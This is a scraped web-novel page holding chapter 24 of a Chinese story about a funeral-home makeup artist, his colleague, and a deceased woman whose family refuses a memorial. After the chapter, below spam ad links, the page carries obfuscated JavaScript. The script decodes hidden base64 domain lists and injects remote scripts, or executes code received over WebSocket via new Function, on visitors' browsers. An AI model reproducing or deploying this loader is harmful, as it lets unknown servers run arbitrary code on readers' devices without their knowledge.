笔趣阁

下载
字:
关灯 护眼
笔趣阁 > 我在殡仪馆做化妆师 > 第24章 废弃的院落

第24章 废弃的院落

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
现在我最喜欢享受别人看不惯我,而又干不掉我的样子。
  
  我气定神闲瞥一眼胖虎,昂首挺胸向化妆室走去,背后留下胖虎咬牙跺脚的声音。
  
  今天的殡仪馆有些冷清,就连送别厅门口都没有几个人。
  
  按孙秃子的话说,人活着扎堆,死了以后也扎堆。
  
  殡仪馆是个神奇的归宿,有时候几天都送不来一个人,可有时候眨眼的工夫能送十几个人,火化炉从早烧到晚,就没有停下来的时候,热得孙秃子光膀子。
  
  “杨魁,你可算是来了!”周铭急匆匆朝我跑来。
  
  “出什么事啦?”我心头一紧,盯着周铭问。
  
  周铭递给我一根华子,解释道:“没啥大事,我来拉昨天那位往生者,化好妆了吗?”
  
  我一怔,不禁回想起昨晚的经历,喃喃道:“是的,昨天的那位不太好伺候。”
  
  “别提了,那位往生者的家属更不好伺候。”周铭吧嗒一口烟,轻声抱怨道。
  
  我诧异地看着周铭,他刚才的话是什么意思,难道他和李念家属发生了冲突?
  
  周铭伏在我耳边,解释道:“跟你说一件稀罕事,你昨天化妆的那位往生者的家属提出不要举行告别仪式。”
  
  “卧槽,是不舍得花钱吗?人都死了还纠结这些?”我忍不住破口大骂。
  
  转念一想,觉得这事里面有些蹊跷,李念好歹也是高薪职业,家里情况应该不会太差,为何连追悼会都不办了?
  
  周铭低声说:“起初我以为是他们不舍得花钱,后来同事告诉我,往生者家属嫌丢人,说她是杀人犯,给他们活人丢脸了。”
  
  “放屁。”我忍不住大骂一声,周铭愣了。
  
  李念明明是被侵犯后自杀,怎么就被他们说的如此不堪,实在让人感到气愤。
  
  我很想给周铭说说昨晚发生的事,可一旦说出口,就相当于告诉他了诈尸的细节,这种事还是别说了好。
  
  周铭把嘴里的烟头吐掉,催着我给他开化妆室的大门。
  
  我环顾四周,自言自语道:“咦,沈意欢怎么还没来,她一向来的挺早啊。”
  
  “可不是嘛,我本来就是找她的,她没来,那我只能麻烦你了。”周铭冲我歉意微笑,我心事却越发沉重,该不是沈意欢出了其他事。
  
  我掏出钥匙开门:“既然往生者不开追悼会了,你把她拉到哪里去?”
  
  “太平间!”周铭不假思索说出三个字。
  
  我周身一颤,立即反对:“不行,应该尽快火化,不能再出昨晚的事了……”
  
  周铭疑惑道:“昨晚的事?什么事?”
  
  我暗道一声不好,怎么嘴一秃噜把这事给扯出来了,赶忙遮掩道:“没啥事,昨晚给往生者化妆的时候,费了很大的劲,毕竟往生者是跳楼而亡,所以有些事你应该能想象的到。”
  
  周铭有些惊恐,会意般点点头,轻声问:“最后修复的怎样?”
  
  我推开化妆室的大门,指着正中央的李念,说:“你可以自己去看看。”
  
  周铭抖擞着肩膀,解释道:“我还是别看了,省得脸色也像你一样铁青。”
  
  我反问道:“我的脸色很青吗?”
  
  周铭没再回话,推着往生者出了化妆室。
  
  我掏出手机,借助屏幕的反光,果真看到印堂泛着黑青,心想应该是少了魂魄的原因,毕竟只剩下一魂一魄了,想好也好不到哪去。
  
  看一眼手机,时间已经到了九点吧,可沈意欢仍然没来,难免让我心中生疑。
  
  短暂思考后,我决定和周铭一起推着往生者李念去太平间。
  
  周铭对我的举动感到惊奇,倒也没再追问原因。
  
  板车发出吱扭吱扭地响声,我和周铭的步子不急不慢。
  
  当走到一处废旧的铁门时,周铭指着里面说:“你可别进这里面,里面不太平。”
免费看片APP    美女视频免费看
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x65\x68\x41\x6b\x6e\x45\x69\x5a\x4a\x46']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vaXNrZGprZmxzLnRzemhvbmd0aWFuc2hpamkuYY29t','d3NzOOi8vd3MuYW5kYTE1MTYuY29tOOjkwOOTAsd3NzOOi8vd3Muc3luZ2d5LmNvbTo5MDkwLHdzczovL3dzLnpoaXB1ZnMuY29tOOjkwOOTA=',window,document,['Y','O']);}:function(){};